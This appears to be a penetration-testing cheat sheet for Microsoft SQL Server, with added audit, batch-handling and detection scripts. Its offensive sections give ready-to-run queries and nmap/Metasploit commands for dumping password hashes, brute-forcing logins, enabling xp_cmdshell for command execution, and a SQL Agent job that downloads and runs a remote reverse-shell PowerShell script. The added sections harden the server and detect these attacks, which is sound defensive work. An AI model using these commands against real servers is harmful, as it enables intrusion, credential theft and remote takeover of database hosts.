# Microsoft SQL Server

### Connecting to the Database

```bash
python3 -m mssqlcli.main -S <ip> -U <user> -P <pass>
```

### Essential Queries

| QUERY | DESCRIPTION |
| :---: | :---: |
| `SELECT @@version` | MSSQL version |
| `SELECT host_name()` | Server hostname |
| `SELECT db_name()` | Current database |
| `SELECT loginname FROM syslogins WHERE sysadmin = 1` | Extracting SQL logins (sysadmin members) |
| `SELECT name FROM sys.databases` | Listing all databases |
| `USE <database>` | Switching to a given database |
| `SELECT * FROM sysusers` | Listing all sys users |
| `SELECT name, password_hash FROM master.sys.sql_logins` | Extracting the users' password hashes |
| `SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsEnabled FROM sys.configurations WHERE name = 'xp_cmdshell'` | Checking whether `xp_cmdshell` is enabled |
| `EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE` | Enabling `xp_cmdshell` |
| `EXEC xp_cmdshell '<command>'` | Running a command on the operating system |
| `SELECT servicename, service_account FROM sys.dm_server_services` | Service name and service account |
| `SELECT name AS database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS trustworthy FROM sys.databases` | Getting each database's owner (and its TRUSTWORTHY flag) |
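The same catalog views read from the auditing side, as an added example that is not part of the original page: one T-SQL script a DBA or assessor can run to see which of the risky settings probed above are on, who holds `sysadmin`, which user databases are TRUSTWORTHY and owned by a sysadmin, which account the services run as, and the statements that turn the weak configuration back off. It assumes a login with `sysadmin` rights; the set of option names checked in step 1 and the `7`-style thresholds are my choices, everything else is documented system views and procedures.

```sql
-- Added audit example (not from the original page): review, then harden.
-- Run as sysadmin from sqlcmd or SSMS.

-- 1. Server-level options that turn a SQL login into OS or network access.
--    value = configured value, value_in_use = value currently in effect.
SELECT name,
       CONVERT(INT, value)        AS configured,
       CONVERT(INT, value_in_use) AS running
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'Ole Automation Procedures',
               N'clr enabled', N'Ad Hoc Distributed Queries');
GO

-- 2. Who holds sysadmin. syslogins is a compatibility view; sys.server_principals is current.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER(N'sysadmin', sp.name) = 1
  AND sp.type IN ('S', 'U', 'G');   -- SQL login, Windows login, Windows group
GO

-- 3. TRUSTWORTHY databases owned by a sysadmin let a db_owner escalate to sysadmin.
--    msdb is TRUSTWORTHY by design, so it is excluded from the finding.
SELECT d.name                    AS database_name,
       SUSER_SNAME(d.owner_sid)  AS database_owner,
       d.is_trustworthy_on
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> N'msdb'
  AND IS_SRVROLEMEMBER(N'sysadmin', SUSER_SNAME(d.owner_sid)) = 1;
GO

-- 4. Service accounts: xp_cmdshell runs as this account for sysadmin callers,
--    so a domain-privileged account here turns RCE into a domain problem.
SELECT servicename, service_account, startup_type_desc, status_desc
FROM sys.dm_server_services;
GO

-- 5. Hardening: advanced options must be visible to change xp_cmdshell;
--    disable it, then hide the advanced options again.
EXEC sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure N'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure N'show advanced options', 0;
RECONFIGURE;
GO

-- 6. Hardening: clear TRUSTWORTHY on each user database reported by step 3.
-- ALTER DATABASE [<database>] SET TRUSTWORTHY OFF;
GO
```

Step 6 is left commented because the database name comes from the step 3 result; run it once per database that does not genuinely need cross-database impersonation.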

### Running Queries

#### sqlcmd

Connecting to the MSSQL host

```bash
sqlcmd -S <ip> -U <user> -P '<pass>'
```

After connecting to the host, you can run SQL commands; however, after typing the query and pressing `Enter`, you must type `go` to signal that the command should be executed (similar to the semicolon). For example, to check the MSSQL version, we would use the following commands:

```sql
select @@version
go
```
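What `go` actually does, as an added example that is not part of the original page: sqlcmd sends everything between two `GO` lines to the server as one batch, and the server compiles and runs that batch as a unit. The script below can be fed to `sqlcmd -i` as-is; the variable name `@v` and the column aliases are mine.

```sql
-- Added example (not from the original page): batch boundaries in sqlcmd.

-- Batch 1: the variable is declared and used inside the same batch.
DECLARE @v NVARCHAR(128) = CONVERT(NVARCHAR(128), SERVERPROPERTY('ProductVersion'));
SELECT @v AS product_version;
GO

-- Batch 2: @v is gone. Uncommenting the first SELECT fails with
-- "Must declare the scalar variable @v"; that compile error aborts only this
-- batch, and sqlcmd continues with the next one unless started with -b.
-- SELECT @v AS product_version;
SELECT DB_NAME() AS database_before_use;
GO

-- Batch 3: session state such as the current database does survive GO.
USE master;
GO
SELECT DB_NAME() AS database_after_use;   -- returns master
GO

-- Batch 4: GO accepts a count; sqlcmd sends this batch three times.
SELECT COUNT(*) AS user_sessions
FROM sys.dm_exec_sessions
WHERE is_user_process = 1;
GO 3
```

This is also why the one-line `USE msdb;EXEC ...;EXEC ...` style of the job-creation query later on this page works: separated by semicolons rather than `GO`, every statement travels as a single batch.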

#### PowerShell

```powershell
Invoke-Sqlcmd -Query '<query>' -Username <user> -Password <pass>
Invoke-Sqlcmd -Inputfile <file.sql> -Username <user> -Password <pass>
```

#### Metasploit

```bash
msfconsole -q
use auxiliary/admin/mssql/mssql_sql
set password <pass>
set username <user>
set rhosts <ip>
exploit
```

### Enumeration

#### Metasploit

MSSQL enumeration

```bash
msfconsole -q
use auxiliary/admin/mssql/mssql_enum
set rhost <ip>
set username <user>
set password <pass>
exploit
```

Enumerating domain user accounts through MSSQL

```bash
sudo msfconsole -q
use auxiliary/admin/mssql/mssql_enum_domain_accounts
set rhost <ip>
exploit
```

#### nmap

MSSQL information

```bash
nmap -p 1433 --script ms-sql-info <ip>
```

MSSQL information via NTLM

```bash
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 <ip>
```

### Blank Password

```bash
nmap -p 1433 --script ms-sql-empty-password <ip>
```

### Extracting Hashes

```bash
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=<user>,mssql.password=<password> <ip>
```

### Listing All Sys Users

```bash
nmap --script ms-sql-query --script-args mssql.username=<user>,mssql.password=<password>,ms-sql-query.query="SELECT * FROM master..syslogins" -p 1433 <ip>
```

### RCE

```bash
nmap --script ms-sql-xp-cmdshell --script-args mssql.username=<user>,mssql.password=<password>,ms-sql-xp-cmdshell.cmd="<command>" -p 1433 <ip>
```

#### Direct Access to SQL Server

If the "SQL Server Agent (MSSQLSERVER)" service is running under a user account, use the query below to gain its permissions.

```sql
USE msdb;EXEC msdb.dbo.sp_delete_job @job_name = N'PowershellExec';EXEC dbo.sp_add_job @job_name = N'PowershellExec';EXEC sp_add_jobstep @job_name = N'PowershellExec', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell -noexit -c "iex (iwr -UseBasicParsing http://<ip>/<reverse_shell.ps1>)"', @retry_attempts = 1, @retry_interval = 5;EXEC dbo.sp_add_jobserver @job_name = N'PowershellExec';EXEC dbo.sp_start_job N'PowershellExec'
```

### Brute Force

#### nmap (Remote)

```bash
nmap -p 1433 --script ms-sql-brute --script-args userdb=<wordlist.txt>,passdb=<wordlist> <ip>
```
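What the brute-force, `xp_cmdshell` and SQL Agent job techniques above leave behind on the instance itself, as an added detection example that is not part of the original page. It reads the SQL Server error log with `xp_readerrorlog` (failed logins are written there when login auditing includes failures, which is the default, and `sp_configure` logs every option change) and queries `msdb` for jobs with operating-system steps. It assumes `sysadmin` rights; the seven-day lookback and the column aliases are my choices, the log message texts are the ones SQL Server writes.

```sql
-- Added detection example (not from the original page). Run as sysadmin.

-- 1. Brute force: failed logins in the current error log (log 0, type 1 = SQL Server log).
--    Each line ends with "[CLIENT: <address>]", which gives the source of the attempts.
EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed', N'CLIENT:';
GO

-- 2. xp_cmdshell enablement: sp_configure writes
--    "Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install."
EXEC master.dbo.xp_readerrorlog 0, 1, N'Configuration option', N'xp_cmdshell';
GO

-- 3. Current state, and who besides sysadmin may call it (EXECUTE grants live in master).
USE master;
GO
SELECT name, CONVERT(INT, value_in_use) AS enabled
FROM sys.configurations
WHERE name = N'xp_cmdshell';

SELECT pr.name AS grantee, pe.permission_name, pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr ON pr.principal_id = pe.grantee_principal_id
WHERE pe.class = 1
  AND pe.major_id = OBJECT_ID(N'master.dbo.xp_cmdshell');
GO

-- 4. Agent jobs with CmdExec or PowerShell steps, newest first. A job created moments ago,
--    owned by an unexpected login and pulling a script from the network is the pattern
--    behind the job-abuse query above.
SELECT j.name                    AS job_name,
       SUSER_SNAME(j.owner_sid)  AS owner_login,
       j.enabled,
       j.date_created,
       j.date_modified,
       s.step_id,
       s.subsystem,
       s.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN (N'CmdExec', N'PowerShell')
ORDER BY j.date_created DESC;
GO

-- 5. Job executions in the last seven days with their outcome
--    (run_status: 0 failed, 1 succeeded, 2 retry, 3 canceled, 4 in progress).
--    run_date is an INT in yyyymmdd form, hence the CONVERT with style 112.
SELECT j.name, h.step_id, h.run_status, h.run_date, h.run_time, h.message
FROM msdb.dbo.sysjobhistory AS h
JOIN msdb.dbo.sysjobs AS j ON j.job_id = h.job_id
WHERE h.run_date >= CONVERT(INT, CONVERT(CHAR(8), DATEADD(DAY, -7, GETDATE()), 112))
ORDER BY h.run_date DESC, h.run_time DESC;
GO
```

Step 4 catches the job whether or not it is still enabled; a job that was created, started and then deleted only shows in step 5's history and in the Agent log (`xp_readerrorlog 0, 2`), which is why job history retention is worth keeping longer than the default.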

### Links

https://learn.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15

